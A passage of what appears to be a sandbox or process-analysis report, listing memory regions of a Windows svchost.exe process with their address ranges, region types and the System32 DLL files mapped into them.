"private_0x0000000002940000" filename = "" Region: id = 4349 start_va = 0x2a40000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a40000" filename = "" Region: id = 4350 start_va = 0x2b40000 end_va = 0x2c7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4351 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 4352 start_va = 0x3000000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 4353 start_va = 0x3320000 end_va = 0x3380fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 4354 start_va = 0x3390000 end_va = 0x3390fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "notificationcontroller.dll.mui" filename = "\\Windows\\System32\\en-US\\NotificationController.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\notificationcontroller.dll.mui") Region: id = 4355 start_va = 0x33b0000 end_va = 0x33b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "syncres.dll" filename = "\\Windows\\System32\\SyncRes.dll" (normalized: "c:\\windows\\system32\\syncres.dll") Region: id = 4356 start_va = 0x3600000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 4357 start_va = 0x3800000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 4358 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4359 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4360 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4361 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4362 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4363 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4364 start_va = 0x7ff612ac0000 end_va = 0x7ff612ad0fff monitored = 0 entry_point = 0x7ff612ac4e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4365 start_va = 0x7fff9a180000 end_va = 0x7fff9a1c3fff monitored = 0 entry_point = 0x7fff9a1ad060 region_type = mapped_file name = "cemapi.dll" filename = "\\Windows\\System32\\cemapi.dll" (normalized: "c:\\windows\\system32\\cemapi.dll") Region: id = 4366 start_va = 0x7fffa8b30000 end_va = 0x7fffa8b8dfff monitored = 0 entry_point = 0x7fffa8b6af80 region_type = mapped_file name = "phoneutil.dll" filename = "\\Windows\\System32\\Phoneutil.dll" (normalized: "c:\\windows\\system32\\phoneutil.dll") Region: id = 4367 start_va = 0x7fffa8b90000 end_va = 0x7fffa8bd6fff monitored = 0 entry_point = 0x7fffa8bbd3d0 region_type = mapped_file name = "accountaccessor.dll" filename = "\\Windows\\System32\\accountaccessor.dll" (normalized: "c:\\windows\\system32\\accountaccessor.dll") Region: id = 4368 start_va = 0x7fffa8be0000 end_va = 0x7fffa8cd4fff monitored = 0 entry_point = 0x7fffa8be2c60 region_type = mapped_file name = "pimstore.dll" filename = "\\Windows\\System32\\Pimstore.dll" (normalized: "c:\\windows\\system32\\pimstore.dll") Region: id = 4369 start_va = 0x7fffa8ce0000 end_va = 0x7fffa8d7bfff monitored = 0 entry_point = 0x7fffa8d4bc80 region_type = mapped_file name = "synccontroller.dll" filename = "\\Windows\\System32\\SyncController.dll" (normalized: "c:\\windows\\system32\\synccontroller.dll") Region: id = 4370 start_va = 0x7fffa8f00000 end_va = 0x7fffa90b1fff monitored = 0 entry_point = 0x7fffa8fc9f60 region_type = mapped_file name = "contentdeliverymanager.utilities.dll" filename = "\\Windows\\System32\\ContentDeliveryManager.Utilities.dll" (normalized: "c:\\windows\\system32\\contentdeliverymanager.utilities.dll") Region: id = 4371 start_va = 0x7fffa91b0000 end_va = 0x7fffa91c0fff monitored = 0 entry_point = 0x7fffa91b7720 region_type = mapped_file name = "userdatatypehelperutil.dll" filename = "\\Windows\\System32\\UserDataTypeHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdatatypehelperutil.dll") Region: id = 4372 start_va = 0x7fffac760000 end_va = 0x7fffac78ffff monitored = 0 entry_point = 0x7fffac780050 region_type = mapped_file name = "mccsengineshared.dll" filename = "\\Windows\\System32\\MCCSEngineShared.dll" (normalized: "c:\\windows\\system32\\mccsengineshared.dll") Region: id = 4373 start_va = 0x7fffac790000 end_va = 0x7fffac7a6fff monitored = 0 entry_point = 0x7fffac798940 region_type = mapped_file name = "aphostclient.dll" filename = "\\Windows\\System32\\APHostClient.dll" (normalized: "c:\\windows\\system32\\aphostclient.dll") Region: id = 4374 start_va = 0x7fffb2dd0000 end_va = 0x7fffb2e2dfff monitored = 0 entry_point = 0x7fffb2dd24d0 region_type = mapped_file name = "wpnclient.dll" filename = "\\Windows\\System32\\wpnclient.dll" (normalized: "c:\\windows\\system32\\wpnclient.dll") Region: id = 4375 start_va = 0x7fffb39b0000 end_va = 0x7fffb3a5efff monitored = 0 entry_point = 0x7fffb39b44f0 region_type = mapped_file name = "shellcommoncommonproxystub.dll" filename = "\\Windows\\System32\\ShellCommonCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\shellcommoncommonproxystub.dll") Region: id = 4376 start_va = 0x7fffb41d0000 end_va = 0x7fffb41dffff monitored = 0 entry_point = 0x7fffb41d7100 region_type = mapped_file name = "userdatalanguageutil.dll" filename = "\\Windows\\System32\\UserDataLanguageUtil.dll" (normalized: "c:\\windows\\system32\\userdatalanguageutil.dll") Region: id = 4377 start_va = 0x7fffb5030000 end_va = 0x7fffb528dfff monitored = 0 entry_point = 0x7fffb5098a80 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 4378 start_va = 0x7fffb6d10000 end_va = 0x7fffb72dcfff monitored = 0 entry_point = 0x7fffb6d99030 region_type = mapped_file name = "twinui.pcshell.dll" filename = "\\Windows\\System32\\twinui.pcshell.dll" (normalized: "c:\\windows\\system32\\twinui.pcshell.dll") Region: id = 4379 start_va = 0x7fffb7e30000 end_va = 0x7fffb7ed8fff monitored = 0 entry_point = 0x7fffb7e3e040 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 4380 start_va = 0x7fffb7f70000 end_va = 0x7fffb7fcdfff monitored = 0 entry_point = 0x7fffb7f72ba0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 4381 start_va = 0x7fffb7fd0000 end_va = 0x7fffb8113fff monitored = 0 entry_point = 0x7fffb7febfd0 region_type = mapped_file name = "wpnapps.dll" filename = "\\Windows\\System32\\wpnapps.dll" (normalized: "c:\\windows\\system32\\wpnapps.dll") Region: id = 4382 start_va = 0x7fffb8120000 end_va = 0x7fffb815ffff monitored = 0 entry_point = 0x7fffb8125af0 region_type = mapped_file name = "windows.staterepositoryclient.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryClient.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryclient.dll") Region: id = 4383 start_va = 0x7fffb8160000 end_va = 0x7fffb81f8fff monitored = 0 entry_point = 0x7fffb816e1c0 region_type = mapped_file name = "tiledatarepository.dll" filename = "\\Windows\\System32\\TileDataRepository.dll" (normalized: "c:\\windows\\system32\\tiledatarepository.dll") Region: id = 4384 start_va = 0x7fffb8390000 end_va = 0x7fffb83e0fff monitored = 0 entry_point = 0x7fffb83a9730 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 4385 start_va = 0x7fffb8bb0000 end_va = 0x7fffb8bc7fff monitored = 0 entry_point = 0x7fffb8bb1bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 4386 start_va = 0x7fffb9a00000 end_va = 0x7fffb9a58fff monitored = 0 entry_point = 0x7fffb9a0daa0 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 4387 start_va = 0x7fffb9af0000 end_va = 0x7fffb9c0cfff monitored = 0 entry_point = 0x7fffb9b0dc60 region_type = mapped_file name = "windows.security.authentication.web.core.dll" filename = "\\Windows\\System32\\Windows.Security.Authentication.Web.Core.dll" (normalized: "c:\\windows\\system32\\windows.security.authentication.web.core.dll") Region: id = 4388 start_va = 0x7fffb9dd0000 end_va = 0x7fffb9e4dfff monitored = 0 entry_point = 0x7fffb9e201b0 region_type = mapped_file name = "quiethours.dll" filename = "\\Windows\\System32\\QuietHours.dll" (normalized: "c:\\windows\\system32\\quiethours.dll") Region: id = 4389 start_va = 0x7fffb9e60000 end_va = 0x7fffb9f47fff monitored = 0 entry_point = 0x7fffb9eaf5b0 region_type = mapped_file name = "windows.cloudstore.schema.shell.dll" filename = "\\Windows\\System32\\Windows.CloudStore.Schema.Shell.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.schema.shell.dll") Region: id = 4390 start_va = 0x7fffb9f50000 end_va = 0x7fffb9f86fff monitored = 0 entry_point = 0x7fffb9f58c10 region_type = mapped_file name = "appextension.dll" filename = "\\Windows\\System32\\AppExtension.dll" (normalized: "c:\\windows\\system32\\appextension.dll") Region: id = 4391 start_va = 0x7fffb9f90000 end_va = 0x7fffba01ffff monitored = 0 entry_point = 0x7fffb9ff2720 region_type = mapped_file name = "appresolver.dll" filename = "\\Windows\\System32\\AppResolver.dll" (normalized: "c:\\windows\\system32\\appresolver.dll") Region: id = 4392 start_va = 0x7fffba400000 end_va = 0x7fffba52bfff monitored = 0 entry_point = 0x7fffba45d0b0 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 4393 start_va = 0x7fffba530000 end_va = 0x7fffba55bfff monitored = 0 entry_point = 0x7fffba54b730 region_type = mapped_file name = "dbgcore.dll" filename = "\\Windows\\System32\\dbgcore.dll" (normalized: "c:\\windows\\system32\\dbgcore.dll") Region: id = 4394 start_va = 0x7fffba560000 end_va = 0x7fffba743fff monitored = 0 entry_point = 0x7fffba57a770 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 4395 start_va = 0x7fffba750000 end_va = 0x7fffba7c8fff monitored = 0 entry_point = 0x7fffba794b40 region_type = mapped_file name = "faultrep.dll" filename = "\\Windows\\System32\\Faultrep.dll" (normalized: "c:\\windows\\system32\\faultrep.dll") Region: id = 4396 start_va = 0x7fffba7d0000 end_va = 0x7fffba7e8fff monitored = 0 entry_point = 0x7fffba7dd470 region_type = mapped_file name = "wpnuserservice.dll" filename = "\\Windows\\System32\\WpnUserService.dll" (normalized: "c:\\windows\\system32\\wpnuserservice.dll") Region: id = 4397 start_va = 0x7fffba7f0000 end_va = 0x7fffbac8dfff monitored = 0 entry_point = 0x7fffba841e80 region_type = mapped_file name = "cdp.dll" filename = "\\Windows\\System32\\cdp.dll" (normalized: "c:\\windows\\system32\\cdp.dll") Region: id = 4398 start_va = 0x7fffbac90000 end_va = 0x7fffbad0bfff monitored = 0 entry_point = 0x7fffbaca07f0 region_type = mapped_file name = "cdpusersvc.dll" filename = "\\Windows\\System32\\cdpusersvc.dll" (normalized: "c:\\windows\\system32\\cdpusersvc.dll") Region: id = 4399 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 4400 start_va = 0x7fffbafb0000 end_va = 0x7fffbb009fff monitored = 0 entry_point = 0x7fffbafbb560 region_type = mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 4401 start_va = 0x7fffbb330000 end_va = 0x7fffbb523fff monitored = 0 entry_point = 0x7fffbb3b4bf0 region_type = mapped_file name = "windows.cloudstore.dll" filename = "\\Windows\\System32\\Windows.CloudStore.dll" (normalized: "c:\\windows\\system32\\windows.cloudstore.dll") Region: id = 4402 start_va = 0x7fffbc540000 end_va = 0x7fffbc5a3fff monitored = 0 entry_point = 0x7fffbc5824b0 region_type = mapped_file name = "syncutil.dll" filename = "\\Windows\\System32\\syncutil.dll" (normalized: "c:\\windows\\system32\\syncutil.dll") Region: id = 4403 start_va = 0x7fffbce40000 end_va = 0x7fffbce53fff monitored = 0 entry_point = 0x7fffbce45660 region_type = mapped_file name = "threadpoolwinrt.dll" filename = "\\Windows\\System32\\threadpoolwinrt.dll" (normalized: "c:\\windows\\system32\\threadpoolwinrt.dll") Region: id = 4404 start_va = 0x7fffbd150000 end_va = 0x7fffbd629fff monitored = 0 entry_point = 0x7fffbd21c180 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4405 start_va = 0x7fffbd920000 end_va = 0x7fffbda65fff monitored = 0 entry_point = 0x7fffbd927620 region_type = mapped_file name = "windows.staterepositoryps.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryPS.dll" (normalized: "c:\\windows\\system32\\windows.staterepositoryps.dll") Region: id = 4406 start_va = 0x7fffbda70000 end_va = 0x7fffbda7efff monitored = 0 entry_point = 0x7fffbda714e0 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 4407 start_va = 0x7fffbdd20000 end_va = 0x7fffbddfafff monitored = 0 entry_point = 0x7fffbddc4140 region_type = mapped_file name = "winsqlite3.dll" filename = "\\Windows\\System32\\winsqlite3.dll" (normalized: "c:\\windows\\system32\\winsqlite3.dll") Region: id = 4408 start_va = 0x7fffbde00000 end_va = 0x7fffbdf73fff monitored = 0 entry_point = 0x7fffbde4d6e0 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 4409 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4410 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4411 start_va = 0x7fffbe670000 end_va = 0x7fffbe6ecfff monitored = 0 entry_point = 0x7fffbe673a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 4412 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4413 start_va = 0x7fffbebf0000 end_va = 0x7fffbec00fff monitored = 0 entry_point = 0x7fffbebf3900 region_type = mapped_file name = "windows.staterepositorycore.dll" filename = "\\Windows\\System32\\Windows.StateRepositoryCore.dll" (normalized: "c:\\windows\\system32\\windows.staterepositorycore.dll") Region: id = 4414 start_va = 0x7fffbee80000 end_va = 0x7fffbef30fff monitored = 0 entry_point = 0x7fffbeec6e10 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 4415 start_va = 0x7fffbef40000 end_va = 0x7fffbf4c5fff monitored = 0 entry_point = 0x7fffbef97790 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 4416 start_va = 0x7fffbf510000 end_va = 0x7fffbf56bfff monitored = 0 entry_point = 0x7fffbf51ddc0 region_type = mapped_file name = "aphostservice.dll" filename = "\\Windows\\System32\\APHostService.dll" (normalized: "c:\\windows\\system32\\aphostservice.dll") Region: id = 4417 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4418 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4419 start_va = 0x7fffc0320000 end_va = 0x7fffc0333fff monitored = 0 entry_point = 0x7fffc0329c20 region_type = mapped_file name = "inproclogger.dll" filename = "\\Windows\\System32\\InprocLogger.dll" (normalized: "c:\\windows\\system32\\inproclogger.dll") Region: id = 4420 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4421 start_va = 0x7fffc06e0000 end_va = 0x7fffc06fefff monitored = 0 entry_point = 0x7fffc06eeba0 region_type = mapped_file name = "dmxmlhelputils.dll" filename = "\\Windows\\System32\\dmxmlhelputils.dll" (normalized: "c:\\windows\\system32\\dmxmlhelputils.dll") Region: id = 4422 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4423 start_va = 0x7fffc1340000 end_va = 0x7fffc15bdfff monitored = 0 entry_point = 0x7fffc13d73a0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 4424 start_va = 0x7fffc15c0000 end_va = 0x7fffc17acfff monitored = 0 entry_point = 0x7fffc163ea20 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4425 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4426 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4427 start_va = 0x7fffc31e0000 end_va = 0x7fffc31fffff monitored = 0 entry_point = 0x7fffc31e1630 region_type = mapped_file name = "dmcfgutils.dll" filename = "\\Windows\\System32\\dmcfgutils.dll" (normalized: "c:\\windows\\system32\\dmcfgutils.dll") Region: id = 4428 start_va = 0x7fffc3200000 end_va = 0x7fffc3214fff monitored = 0 entry_point = 0x7fffc3208b60 region_type = mapped_file name = "userdataplatformhelperutil.dll" filename = "\\Windows\\System32\\UserDataPlatformHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdataplatformhelperutil.dll") Region: id = 4429 start_va = 0x7fffc3220000 end_va = 0x7fffc3279fff monitored = 0 entry_point = 0x7fffc32363c0 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 4430 start_va = 0x7fffc3280000 end_va = 0x7fffc32eefff monitored = 0 entry_point = 0x7fffc328a850 region_type = mapped_file name = "wincorlib.dll" filename = "\\Windows\\System32\\wincorlib.dll" (normalized: "c:\\windows\\system32\\wincorlib.dll") Region: id = 4431 start_va = 0x7fffc32f0000 end_va = 0x7fffc32fcfff monitored = 0 entry_point = 0x7fffc32f25d0 region_type = mapped_file name = "mccspal.dll" filename = "\\Windows\\System32\\MCCSPal.dll" (normalized: "c:\\windows\\system32\\mccspal.dll") Region: id = 4432 start_va = 0x7fffc3390000 end_va = 0x7fffc33b5fff monitored = 0 entry_point = 0x7fffc33a3a80 region_type = mapped_file name = "networkhelper.dll" filename = "\\Windows\\System32\\networkhelper.dll" (normalized: "c:\\windows\\system32\\networkhelper.dll") Region: id = 4433 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4434 start_va = 0x7fffc3fc0000 end_va = 0x7fffc40b7fff monitored = 0 entry_point = 0x7fffc3fd73e0 region_type = mapped_file name = "appxdeploymentclient.dll" filename = "\\Windows\\System32\\AppXDeploymentClient.dll" (normalized: "c:\\windows\\system32\\appxdeploymentclient.dll") Region: id = 4435 start_va = 0x7fffc4780000 end_va = 0x7fffc4795fff monitored = 0 entry_point = 0x7fffc4784250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 4436 start_va = 0x7fffc47a0000 end_va = 0x7fffc47d8fff monitored = 0 entry_point = 0x7fffc47bfcf0 region_type = mapped_file name = "windows.devices.radios.dll" filename = "\\Windows\\System32\\Windows.Devices.Radios.dll" (normalized: "c:\\windows\\system32\\windows.devices.radios.dll") Region: id = 4437 start_va = 0x7fffc47f0000 end_va = 0x7fffc47fcfff monitored = 0 entry_point = 0x7fffc47f2090 region_type = mapped_file name = "systemeventsbrokerclient.dll" filename = "\\Windows\\System32\\SystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerclient.dll") Region: id = 4438 start_va = 0x7fffc4a20000 end_va = 0x7fffc51b0fff monitored = 0 entry_point = 0x7fffc4a35f30 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecoreuapcommonproxystub.dll") Region: id = 4439 start_va = 0x7fffc56c0000 end_va = 0x7fffc58c1fff monitored = 0 entry_point = 0x7fffc572d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 4440 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4441 start_va = 0x7fffc65e0000 end_va = 0x7fffc66d4fff monitored = 0 entry_point = 0x7fffc6622860 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4442 start_va = 0x7fffc6740000 end_va = 0x7fffc6753fff monitored = 0 entry_point = 0x7fffc67428c0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4443 start_va = 0x7fffc6760000 end_va = 0x7fffc688ffff monitored = 0 entry_point = 0x7fffc67fdcf0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 4444 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4445 start_va = 0x7fffc7090000 end_va = 0x7fffc7274fff monitored = 0 entry_point = 0x7fffc70eddd0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 4446 start_va = 0x7fffc7960000 end_va = 0x7fffc7a51fff monitored = 0 entry_point = 0x7fffc79b70f0 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 4447 start_va = 0x7fffc7c60000 end_va = 0x7fffc7cfefff monitored = 0 entry_point = 0x7fffc7c89120 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 4448 start_va = 0x7fffc7f10000 end_va = 0x7fffc7f39fff monitored = 0 entry_point = 0x7fffc7f19e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 4449 start_va = 0x7fffc8010000 end_va = 0x7fffc803dfff monitored = 0 entry_point = 0x7fffc80142d0 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 4450 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4451 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4452 start_va = 0x7fffc8d40000 end_va = 0x7fffc8d64fff monitored = 0 entry_point = 0x7fffc8d43920 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 4453 start_va = 0x7fffc8d70000 end_va = 0x7fffc8d98fff monitored = 0 entry_point = 0x7fffc8d71bd0 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 4454 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4455 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4456 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4457 start_va = 0x7fffc97f0000 end_va = 0x7fffc9802fff monitored = 0 entry_point = 0x7fffc97fa490 region_type = mapped_file name = "ntlmshared.dll" filename = "\\Windows\\System32\\NtlmShared.dll" (normalized: "c:\\windows\\system32\\ntlmshared.dll") Region: id = 4458 start_va = 0x7fffc9810000 end_va = 0x7fffc9899fff monitored = 0 entry_point = 0x7fffc98308b0 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 4459 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: 